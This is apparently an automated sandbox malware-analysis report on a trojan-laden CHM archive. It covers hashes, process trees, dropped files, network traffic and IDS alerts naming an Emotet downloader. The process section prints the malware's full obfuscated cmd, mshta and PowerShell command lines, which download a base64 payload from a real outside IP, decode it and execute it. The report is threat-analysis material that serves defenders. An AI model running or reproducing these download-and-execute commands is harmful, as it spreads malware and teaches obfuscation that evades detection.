analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Dopolnenie_k_prikazu.chm.z

Full analysis: https://app.any.run/tasks/1b4341c0-a957-4e37-8df4-6af6ab69638b
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Analysis date: November 15, 2018, 09:02:41
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
Indicators:
MIME: application/x-compress
File info: compress'd data 16 bits
MD5:

79C1EEDEB08158A8E80B90926A1A09F3

SHA1:

A049013D90CD3C675016E5AACEA4729FFB2B648C

SHA256:

C2EF026CF58E29321CAA537F7A03DE658AE851E466F6B9E29A8BE794BAC27456

SSDEEP:

192:zcbWAlSMTl/XGrVJMBEBuHrwyfCmF8jgjCot:zc9SMT5XGRJVyt8Mt

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • priprif.com (PID: 2796)
      • pripriff.com (PID: 120)
      • pripriff.com (PID: 2552)
      • cmd.exe (PID: 3628)
      • cmd.exe (PID: 3116)
      • cmd.exe (PID: 3216)
      • pripriff.com (PID: 3712)
      • cmd.exe (PID: 2836)
      • pripriff.com (PID: 4024)
      • pripri.com (PID: 3968)
      • cmd.exe (PID: 3356)
      • priprif.com (PID: 2088)
    • Changes the autorun value in the registry

      • pripri.com (PID: 3968)
  • SUSPICIOUS

    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • cmd.exe (PID: 3216)
      • cmd.exe (PID: 2836)
    • Executable content was dropped or overwritten

      • cmd.exe (PID: 3628)
      • cmd.exe (PID: 3116)
      • priprif.com (PID: 2088)
      • pripri.com (PID: 3968)
    • Starts application with an unusual extension

      • pripriff.com (PID: 2552)
      • cmd.exe (PID: 3628)
      • cmd.exe (PID: 3116)
      • pripriff.com (PID: 4024)
      • priprif.com (PID: 2088)
    • Starts CMD.EXE for commands execution

      • mshta.exe (PID: 3736)
      • hh.exe (PID: 3364)
      • pripri.com (PID: 3968)
    • Reads Internet Cache Settings

      • hh.exe (PID: 3364)
    • Reads internet explorer settings

      • hh.exe (PID: 3364)
    • Starts itself from another location

      • cmd.exe (PID: 3116)
    • Creates files in the user directory

      • pripri.com (PID: 3968)
    • Creates files in the program directory

      • cmd.exe (PID: 3356)
    • Uses SYSTEMINFO.EXE to read environment

      • cmd.exe (PID: 3356)
  • INFO

    • Reads internet explorer settings

      • mshta.exe (PID: 3736)
      • mshta.exe (PID: 3460)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.z | UNIX Compressed data (100)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
58
Monitored processes
18
Malicious processes
9
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start drop and start drop and start drop and start drop and start winrar.exe no specs hh.exe no specs cmd.exe no specs mshta.exe cmd.exe pripriff.com no specs pripriff.com no specs priprif.com cmd.exe pripriff.com no specs pripriff.com no specs priprif.com pripri.com cmd.exe no specs mshta.exe cmd.exe no specs systeminfo.exe no specs notepad.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3272"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Dopolnenie_k_prikazu.chm.z"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.60.0
3364"C:\Windows\hh.exe" C:\Users\admin\AppData\Local\Temp\Rar$DIa3272.9034\Dopolnenie_k_prikazu.chmC:\Windows\hh.exeWinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® HTML Help Executable
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3216"C:\Windows\System32\cmd.exe" ,/b,^, ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,/C,, st%ALLUSERSPROFILE:~8,1%rt msht%ALLUSERSPROFILE:~8,1% H%ALLUSERSPROFILE:~12,1%%ALLUSERSPROFILE:~12,1%p://146.0.72.139/liC:\Windows\System32\cmd.exehh.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3736mshta Http://146.0.72.139/liC:\Windows\system32\mshta.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3628"C:\Windows\System32\cmd.exe" /c copy C:\\Windows\\System32\\cmd.exe C:\Users\admin\AppData\Local\Temp\\pripriff.com && C:\Users\admin\AppData\Local\Temp\\pripriff.com /c &Set skk= -Encoding&& Set ski= Byte && Set asidfjhfwssss=den -n%ALLUSERSPROFILE:~5,1%ninter&&Set asidfjhfwsss=-n%ALLUSERSPROFILE:~5,1%p -W hid&& Set asidfjhfwsssss=active -c (new-%ALLUSERSPROFILE:~5,1%bj&& Set asidfjhfwss=ect System.Net.WebClie&& Set par5=nt).D%ALLUSERSPROFILE:~5,1%wnl%ALLUSERSPROFILE:~5,1%&& Set asidfjhfwsssssssssssssss=adfile& copy C:\\Windows\\System32\\WiNDOWSPOWerShELl\\v1.0\\pOWErsheLl.ExE C:\Users\admin\AppData\Local\Temp\\priprif.com& C:\Users\admin\AppData\Local\Temp\\pripriff.com /c C:\Users\admin\AppData\Local\Temp\\priprif.com %asidfjhfwsss%%asidfjhfwssss%%asidfjhfwsssss%%asidfjhfwss%%par5%%asidfjhfwsssssssssssssss%('Ht^Tp://146.0.72.139/flk', 'C:\Users\admin\AppData\Local\Temp\\pripri.txt'); $sr=Get-Content %skk% %ski% C:\Users\admin\AppData\Local\Temp\\pripri.txt; $sk=[System.Text.Encoding]::UTF8.GetString($sr); $sv=[Convert]::FromBase64String($sk); Add-Content %skk% %ski% C:\Users\admin\AppData\Local\Temp\\pripri.com $sv; C:\Users\admin\AppData\Local\Temp\\pripri.com;C:\Windows\System32\cmd.exe
mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
120C:\Users\admin\AppData\Local\Temp\\pripriff.com /c C:\Users\admin\AppData\Local\Temp\pripriff.comcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2552C:\Users\admin\AppData\Local\Temp\\pripriff.com /c C:\Users\admin\AppData\Local\Temp\\priprif.com %asidfjhfwsss%%asidfjhfwssss%%asidfjhfwsssss%%asidfjhfwss%%par5%%asidfjhfwsssssssssssssss%('HtTp://146.0.72.139/flk', 'C:\Users\admin\AppData\Local\Temp\\pripri.txt'); $sr=Get-Content %skk% %ski% C:\Users\admin\AppData\Local\Temp\\pripri.txt; $sk=[System.Text.Encoding]::UTF8.GetString($sr); $sv=[Convert]::FromBase64String($sk); Add-Content %skk% %ski% C:\Users\admin\AppData\Local\Temp\\pripri.com $sv; C:\Users\admin\AppData\Local\Temp\\pripri.com;C:\Users\admin\AppData\Local\Temp\pripriff.comcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2796C:\Users\admin\AppData\Local\Temp\\priprif.com -nop -W hidden -noninteractive -c (new-object System.Net.WebClient).Downloadfile('HtTp://146.0.72.139/flk', 'C:\Users\admin\AppData\Local\Temp\\pripri.txt'); $sr=Get-Content -Encoding Byte C:\Users\admin\AppData\Local\Temp\\pripri.txt; $sk=[System.Text.Encoding]::UTF8.GetString($sr); $sv=[Convert]::FromBase64String($sk); Add-Content -Encoding Byte C:\Users\admin\AppData\Local\Temp\\pripri.com $sv; C:\Users\admin\AppData\Local\Temp\\pripri.com;C:\Users\admin\AppData\Local\Temp\priprif.com
pripriff.com
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3116"C:\Windows\System32\cmd.exe" /c copy C:\\Windows\\System32\\cmd.exe C:\Users\admin\AppData\Local\Temp\\pripriff.com && C:\Users\admin\AppData\Local\Temp\\pripriff.com /c &Set skk= -Encoding&& Set ski= Byte&& Set asidfjhfwssss=den -n%ALLUSERSPROFILE:~5,1%ninter&&Set asidfjhfwsss=-n%ALLUSERSPROFILE:~5,1%p -W hid&& Set asidfjhfwsssss=active -c (new-%ALLUSERSPROFILE:~5,1%bj&& Set asidfjhfwss=ect System.Net.WebClie&& Set par5=nt).D%ALLUSERSPROFILE:~5,1%wnl%ALLUSERSPROFILE:~5,1%&& Set asidfjhfwsssssssssssssss=adfile& copy C:\\Windows\\SYsWOW64\\WiNDOWSPOWerShELl\\v1.0\\pOWErSheLl.ExE C:\Users\admin\AppData\Local\Temp\\priprif.com& C:\Users\admin\AppData\Local\Temp\\pripriff.com /c C:\Users\admin\AppData\Local\Temp\\priprif.com %asidfjhfwsss%%asidfjhfwssss%%asidfjhfwsssss%%asidfjhfwss%%par5%%asidfjhfwsssssssssssssss%('Ht^Tp://146.0.72.139/flk', 'C:\Users\admin\AppData\Local\Temp\\pripri.txt');$sr=Get-Content %skk% %ski% C:\Users\admin\AppData\Local\Temp\\pripri.txt; $sk=[System.Text.Encoding]::UTF8.GetString($sr); $sv=[Convert]::FromBase64String($sk); Add-Content %skk% %ski% C:\Users\admin\AppData\Local\Temp\\pripri.com $sv; C:\Users\admin\AppData\Local\Temp\\pripri.com;C:\Windows\System32\cmd.exe
mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3712C:\Users\admin\AppData\Local\Temp\\pripriff.com /c C:\Users\admin\AppData\Local\Temp\pripriff.comcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
1 571
Read events
1 408
Write events
0
Delete events
0

Modification events

No data
Executable files
5
Suspicious files
0
Text files
4
Unknown types
1

Dropped files

PID
Process
Filename
Type
3356cmd.exeC:\ProgramData\INFOCONTENT.TXTtext
MD5:760957E0268AFC63EA511B994789189A
SHA256:BDD1D6139F8F3414F140A8AFE8C45E65F0CB03CC9A83F2F3AB74F65F67D21FDC
3272WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DIa3272.9034\Dopolnenie_k_prikazu.chmchi
MD5:38303299C65EF84DFF0E4212FD5BB3BF
SHA256:1135813663BF9C747A1CCA7312AEF97D345D231DF5CDEB314CB8606017D26D86
2088priprif.comC:\Users\admin\AppData\Local\Temp\pripri.comexecutable
MD5:13CC98FCB654AC83CDA6D3EC9946FA9B
SHA256:0E0729B51709325688F2741E2D5C6B3F547901837D89C203CB8AA2985B5F0018
3736mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\li[1]html
MD5:D0FA1AB050BEDE3522650FAA54BBAB2D
SHA256:9D10F123C6252C7DB2BE34176B5D76101286DBABC976AD9E0A2493D5D7559295
3364hh.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R9ZEWH8D\start[1]html
MD5:892AB312873E0A88AD45762072287FEC
SHA256:FABC64313E18FD66B44E418C2883FACBD5588A9D98BAF0DCC002E730D72EAD8D
3968pripri.comC:\Users\admin\AppData\Roaming\conhost.exe 1C9B74E8.exeexecutable
MD5:13CC98FCB654AC83CDA6D3EC9946FA9B
SHA256:0E0729B51709325688F2741E2D5C6B3F547901837D89C203CB8AA2985B5F0018
2088priprif.comC:\Users\admin\AppData\Local\Temp\pripri.txttext
MD5:53F4A016A61040273478E1C3C10FF8A3
SHA256:9FB4281BC5994209DCED167E4D34BFEDF3B8A6F882B1A7C92F30970DB5E30548
3116cmd.exeC:\Users\admin\AppData\Local\Temp\pripriff.comexecutable
MD5:AD7B9C14083B52BC532FBA5948342B98
SHA256:17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE
3628cmd.exeC:\Users\admin\AppData\Local\Temp\pripriff.comexecutable
MD5:AD7B9C14083B52BC532FBA5948342B98
SHA256:17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE
3628cmd.exeC:\Users\admin\AppData\Local\Temp\priprif.comexecutable
MD5:92F44E405DB16AC55D97E3BFE3B132FA
SHA256:6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
4
DNS requests
0
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2088
priprif.com
GET
200
146.0.72.139:80
http://146.0.72.139/flk
NL
text
136 Kb
suspicious
3736
mshta.exe
GET
200
146.0.72.139:80
http://146.0.72.139/li
NL
html
2.93 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3736
mshta.exe
146.0.72.139:80
Hostkey B.v.
NL
suspicious
2088
priprif.com
146.0.72.139:80
Hostkey B.v.
NL
suspicious
2796
priprif.com
146.0.72.139:80
Hostkey B.v.
NL
suspicious
3460
mshta.exe
146.0.72.139:80
Hostkey B.v.
NL
suspicious

DNS requests

No data

Threats

PID
Process
Class
Message
2088
priprif.com
A Network Trojan was detected
SC TROJAN_DOWNLOADER Generic Trojan Emotet downloader
2088
priprif.com
A Network Trojan was detected
ET TROJAN Windows executable base64 encoded
2088
priprif.com
Misc activity
POLICY [PTsecurity] Executable base64 Payload
No debug info